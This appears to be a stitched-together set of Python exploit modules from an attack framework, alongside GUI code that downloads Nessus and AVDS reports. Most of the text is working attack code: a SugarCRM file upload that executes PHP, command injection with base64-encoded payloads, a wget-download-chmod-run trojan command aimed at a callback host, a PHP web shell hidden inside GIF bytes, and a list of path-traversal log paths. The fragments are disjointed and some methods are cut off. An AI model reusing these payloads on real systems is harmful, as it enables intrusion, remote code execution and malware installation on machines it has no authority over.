column[0] = gtk.TreeViewColumn(column_names[0],
gtk.CellRendererText(),
text=0)
column[0].set_resizable(True)
column[0].set_sort_column_id(0)
column[1] = gtk.TreeViewColumn(column_names[1],
gtk.CellRendererText(),
text=1)
column[1].set_resizable(True)
column[1].set_sort_column_id(1)
column[2] = gtk.TreeViewColumn(column_names[2],
gtk.CellRendererText(),
text=2)
column[2].set_resizable(True)
column[2].set_sort_column_id(2)
self.treeview_3.append_column(column[0])
self.treeview_3.append_column(column[1])
self.treeview_3.append_column(column[2])
# Start downloader dialog
result = self.loaddlg.run()
if (result == gtk.RESPONSE_OK):
if (self.treeselection.count_selected_rows() > 0):
model, paths = self.treeselection.get_selected_rows()
for p in paths:
iter = self.treestore_3.get_iter(p)
tmpRef = model.get_value(iter, 2)
self.SelectedScan.append(tmpRef)
mainurl = "https://" + self.qhost + ":" + self.port
headers = [("Content-Type", "application/json")]
UA = spkproxy.UserAgent(mainurl, exploit=self)
UA.addHeader("X-Cookie", "token=%s" % self.token)
for ref in self.SelectedScan:
error = True
self.log("[D2 LOG] Nessus get file information for %s" %
ref)
postdata = {
'format': 'nessus',
}
urldata = json.dumps(postdata)
data = UA.POST(self.exporturl % ref,
data=urldata,
extraheaders=headers)
response = json.loads(data)
if "file" not in response:
self.log("[D2 LOG] No file available")
continue
file_id = response["file"]
self.log("[D2 LOG] Nessus get status file %s" % file_id)
for i in range(0, 20):
data = UA.GET(self.statusurl % (ref, file_id))
response = json.loads(data)
if "status" not in response:
self.log("[D2 LOG] Status not found")
break
status = response["status"]
if status == "ready":
error = False
break
time.sleep(1)
if error == True:
continue
self.log("[D2 LOG] Nessus download file %s" % file_id)
data = UA.GET(self.reporturl % (ref, file_id))
if not os.path.exists(self.exploitpath + "reports/"):
os.mkdir(self.exploitpath + "reports/")
filename = self.exploitpath + "reports/" + ref.replace(
"/", "_")
f = open(filename, "w")
f.write(data)
f.close()
self.ReportFiles.append(filename)
self.treestore_2.append(None, [filename])
else:
self.log("[D2 LOG] - No Nessus report selected")
self.loaddlg.destroy()
def run(self):
self.getargs()
test = self.test()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.hostname, self.port))
self.log("Attacking %s:%d" % (self.hostname, self.port))
#self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user != "":
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
self.log("useragentstring: %s" % useragentstring)
UA = spkproxy.UserAgent(useragentstring,
auth=auth,
hostname=self.hostname,
exploit=self)
response = UA.POST(
self.loginpage,
"module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++"
% (self.username, self.password),
noresponse=False)
#self.log("AFTER LOGIN %s"%response)
#if the user has not assigned a valid timezone in which they reside then we can't continue to get a userid
#if "action=SetTimezone" in response:
#self.log("setting time zone for %s"%self.username)
response = UA.POST(
self.timezonepage,
"record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++"
)
#self.log(response)
#find out what are assigned userid is
#<a href="index.php?module=Emails&action=ListView&assigned_user_id=abf7c77b-2f71-8071-63ba-4a131068e9a2&type=archived">
#not very pretty - but it works!
response = UA.GET(self.composemailpage)
#self.log(response)
try:
userid = response.split("assigned_user_id=")[1].split("&")[0]
self.log("Assigned User-Id: %s" % userid)
except:
self.log(
"Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!"
)
return 0
#push our file up
UA.addHeader(
"Content-Type",
"multipart/form-data; boundary=---------------------------3922242971797626524322043819"
)
response = UA.POST(self.composemailpage, self.getfile())
#self.log(response)
#{"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"}
try:
prefix = response.split(",")[0].split(":")[1].strip("\"")
ourphpfilename = prefix + ".php"
self.log("our remote filename: %s" % ourphpfilename)
except:
self.log(
"Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!"
)
return 0
ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename
self.log("Path to our file: %s" % ourfile)
#execute our file!
UA.clearHeaders()
response = UA.GET(ourfile, noresponse=True)
for i in xrange(0, 3): #wait three seconds for callback
time.sleep(1)
ret = self.ISucceeded()
if ret:
break
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
if (self.argsDict.get("cmd", self.cmd) == ""):
self.TROJANMODE = 1
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
s = self.gettcpsock()
try:
s.connect((self.host, self.port))
except:
self.log('Could not connect to port %s:%s' %
(self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
self.cmd = '%s > ../backup/d2' % self.cmd
self.cmd = base64.b64encode(
'sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";%s;" /fakedir' %
self.cmd)
params = urllib.urlencode({
'url':
'aHR0cDovL3d3dy5kMnNlYy5jb20=',
'args_reason':
'unknown',
'filetype':
'unknown',
'user_encoded':
'ZDI=',
'domain':
'http://www.d2sec.com;eval `printf %s | base64 -d`' % self.cmd,
'raw_category_id':
'1|2|3|4',
'user':
'******'
})
url = "/end-user/index.php?c=blocked&action=continue"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.POST(mainurl, params)
url = "/backup/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
if (self.TROJANMODE == 1):
while 1:
time.sleep(1)
else:
self.log('[D2SEC] %s' % data)
return 1
def download(self, widget):
self.SelectedScan = []
column_names = ['ID', 'Name', 'Date']
gladefile = self.exploitpath + "simple2.glade"
self.wTree2 = gtk.glade.XML(gladefile)
dic = {
"on_start_clicked": self.start,
"on_delreport_toggled": self.activatedel,
"on_deselectall_clicked": self.deselectall,
"on_selectall_clicked": self.selectall
}
self.wTree2.signal_autoconnect(dic)
self.loaddlg = self.wTree2.get_widget("exploit_dialog")
try:
self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
except:
pass
# Init reports treeview
self.treeview_3 = self.wTree2.get_widget("mytree")
self.treestore_3 = gtk.TreeStore(str, str, str)
self.treeview_3.set_show_expanders(False)
self.treeview_3.set_model(self.treestore_3)
self.treeselection = self.treeview_3.get_selection()
self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)
column = [None] * len(column_names)
column[0] = gtk.TreeViewColumn(column_names[0],
gtk.CellRendererText(),
text=0)
column[0].set_resizable(True)
column[0].set_sort_column_id(0)
column[1] = gtk.TreeViewColumn(column_names[1],
gtk.CellRendererText(),
text=1)
column[1].set_resizable(True)
column[1].set_sort_column_id(1)
column[2] = gtk.TreeViewColumn(column_names[2],
gtk.CellRendererText(),
text=2)
column[2].set_resizable(True)
column[2].set_sort_column_id(2)
self.treeview_3.append_column(column[0])
self.treeview_3.append_column(column[1])
self.treeview_3.append_column(column[2])
# Start downloader dialog
result = self.loaddlg.run()
if (result == gtk.RESPONSE_OK):
if (self.treeselection.count_selected_rows() > 0):
model, paths = self.treeselection.get_selected_rows()
for p in paths:
iter = self.treestore_3.get_iter(p)
tmpRef = model.get_value(iter, 0)
self.SelectedScan.append(tmpRef)
for ref in self.SelectedScan:
mainurl = "https://" + self.qhost
headers = [("Content-Type", "application/json")]
UA = spkproxy.UserAgent(mainurl, exploit=self)
data = UA.GET(
self.jsonurl +
"primary=vulnerabilities&secondary=report&action=getreport&format=xml&network=%s&apikey=%s"
% (ref, self.apikey))
response = json.loads(data)
if "error" in response:
error = response['error']
self.log(
"[D2 LOG] AVDS ERROR [%s %s %s]" %
(error['type'], error['param'], error['message']))
continue
if not "compresseddata" in response:
self.log("[D2 LOG] ERROR: No scan available")
return
buff = response['compresseddata']
buff = base64.b64decode(buff)
xml = zlib.decompress(buff)
if not os.path.exists(self.exploitpath + "reports/"):
os.mkdir(self.exploitpath + "reports/")
filename = self.exploitpath + "reports/" + ref
f = open(filename, "w")
f.write(xml)
f.close()
self.ReportFiles.append(filename)
self.treestore_2.append(None, [filename])
else:
self.log("[D2 LOG] - No AVDS report selected")
self.loaddlg.destroy()
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(self.name, self.host, self.port))
self.log("Using version: %s" % self.version)
if self.version == 0:
ret = self.test()
if not ret:
self.setInfo(
"%s against %s:%d (failed: didn't find vulnerable target!)"
% (self.name, self.host, self.port))
self.log("Testing didn't find vulnerable target")
return 0
if not self.hostname:
self.hostname = self.host
self.log("Attacking %s:%d" % (self.host, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#setup our UA first
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
targetstring = protocol + "://" + self.hostname + ":" + str(
self.port) + self.basepath
self.log("Targetstring: %s" % targetstring)
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
if hasattr(self, "content_type"):
self.ua.addHeader("Content-Type", self.content_type)
if self.webserverport:
self.set_up_webserver()
noresponse = True
noresponse = True
if self.command:
#we do get the response if we are sending it a command
noresponse = False
if self.verb == "POST":
body = self.getbody()
self.log("POSTING data of length %s" % len(body))
data = self.ua.POST(
self.targetpath, body, noresponse=noresponse
) #fix noresponce in POST noresponse=noresponse
elif self.verb == "GET":
data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(),
noresponse=noresponse)
if self.command and data:
blah = self.parse_command_response(data)
if self.webserverport:
#let's accept a connection if this is an RFI exploit
#we should have timed out on the top connection
ret = self.server.accept()
if ret:
self.log("Found callback to our web server: %s!" % ret)
else:
self.log("Recved result of: %s" % data)
ret = self.ISucceeded()
return ret
def __init__(self):
canvasexploit.__init__(self)
#hostname="http://google.com"
#elf.hostname=hostname
self.ua=spkproxy.UserAgent("") #placeholder
self.name=""
#self.ssl=""
self.webserverport=0 #set to non-zero to make it an RFI exploit
self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\
chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\
chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\
chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\
chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\
chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+\
"""<?php
error_reporting(0);
ini_set('max_execution_time',0);
print 'startz';
passthru(base64_decode($_REQUEST[SERVER_INFO]));
eval(base64_decode($_REQUEST[SERVER_INFO2]));
print 'endz';
exit;
?>"""+\
chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\
chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\
chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\
chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\
chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\
chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\
chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\
chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\
chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\
chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\
chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\
chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\
chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\
chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\
chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\
chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\
chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\
chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\
chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\
chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\
chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\
chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\
chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\
chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\
chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\
chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\
chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\
chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\
chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\
chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\
chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\
chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\
chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\
chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\
chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\
chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\
chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\
chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\
chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\
chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\
chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\
chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\
chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\
chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\
chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\
chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\
chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\
chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\
chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\
chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\
chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\
chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\
chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\
chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\
chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\
chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\
chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00)
self.log_paths = [
"../../../../../../var/log/apache2/access.log",
"../../../../../../var/log/apache2/error.log",
"../../../../../var/log/apache2/access.log",
"../../../../../var/log/apache2/error.log",
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log",
"../../../../../../var/log/apache2/error.log"]
self.useragents = [
"Googlebot/2.1 ( http://www.google.com/bot.html)",
"msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
"Mozilla/5.0 (X11; U; Linux x86; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.2+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.7.5) Gecko/20070321 Netscape/8.1.3",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20070321 Netscape/9.0",
"Opera/9.23 (Windows NT 5.0; U; en)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/4.8 [en] (Windows NT 6.0; U)",
"Opera/9.20 (Windows NT 6.0; U; en)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4",
"Opera/9.20 (X11; Linux i686; U; en)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20060601 Firefox/2.0.0.4 (Ubuntu-edgy)",
"Opera/9.10 (Windows NT 5.1; U; en)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.3 (like Gecko)",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4",
"Opera/9.23 (X11; FreeBSD 6 i386; U; en)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5"]
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.maketrojan()
hex_s = "".join("\\x%02x" % ord(b) for b in self.mosdeftrojan)
self.TROJANMODE = 1
self.cmd = "printf \"" + hex_s + "\" > /tmp/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
ua.addHeader(
"User-Agent",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
)
# Authentication
url = "/cgi-bin/userLogin"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'username': self.username,
'password': self.password,
'domain': 'LocalDomain',
'loginButton': 'Login',
'state': 'login',
'login': '******',
'verifyCert': '0',
'portalname': 'VirtualOffice',
'ajax': 'true'
})
data = ua.POST(mainurl, params)
if "Login failed" in data:
self.log('[D2SEC] Authentication error')
return 0
# Exploitation
if self.TROJANMODE == 1:
self.split_cmd(ua, hex_s)
pass
else:
self.send_cmd(ua, 'rm -f /usr/src/EasyAccess/www/htdocs/images/d2')
self.cmd = '%s > /usr/src/EasyAccess/www/htdocs/images/d2' % self.cmd
self.send_cmd(ua, self.cmd)
url = "/images/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port,
url)
data = ua.GET(mainurl)
if 'not available' in data:
self.log('[D2SEC] Result not available')
return 0
else:
self.log('[D2SEC] %s' % data)
return 1
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
if self.version == 0:
ret = self.test()
if not ret:
self.log("Testing didn't find vulnerable target")
return 0
self.log("Attacking %s:%d" % (self.host, self.port))
